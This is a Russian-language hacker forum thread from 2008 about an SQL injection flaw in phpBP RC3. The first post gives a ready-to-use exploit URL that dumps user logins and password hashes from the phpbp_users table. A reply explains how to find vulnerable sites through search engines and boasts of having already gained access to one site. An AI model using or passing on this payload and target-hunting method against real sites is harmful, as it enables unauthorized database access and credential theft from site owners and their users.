SQL-инъекция в phpBP

Тема в разделе ".:: Уязвимости", создана пользователем d1mka, 23 мар 2008.

Статус темы:
Закрыта.
  1. d1mka

    d1mka Постоялец

    Регистр.:
    20 мар 2007
    Сообщения:
    92
    Симпатии:
    23
    Программа: phpBP RC3 (2.204) FIX4

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://[host]/[path]/index.php?function=banner_out&id=10000/* */LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F, login,0x5F,pass),4,5,6,7,8,9/**/FROM/* */phpbp_users/**/LIMIT/**/1/*
     
    imral, digger3d, Gelios7 и 2 другим нравится это.
  2. Dador

    Dador Читатель

    Заблокирован
    Регистр.:
    14 янв 2008
    Сообщения:
    368
    Симпатии:
    97
    Искать в гугле можно так
    но так почти ничего нет, лучше так
    т.е. во ссылочка на результаты =)
    ТУТ

    p.s. может ешсть ешё какие? просто эти сам взял как обычно снизу с копирайтов =) а их могут убрать (копирайты)

    А куда прикидывает (у меня это
    это и есть логин_пароль в md5
    уже доступ от 1 сайта получил =)
     
Статус темы:
Закрыта.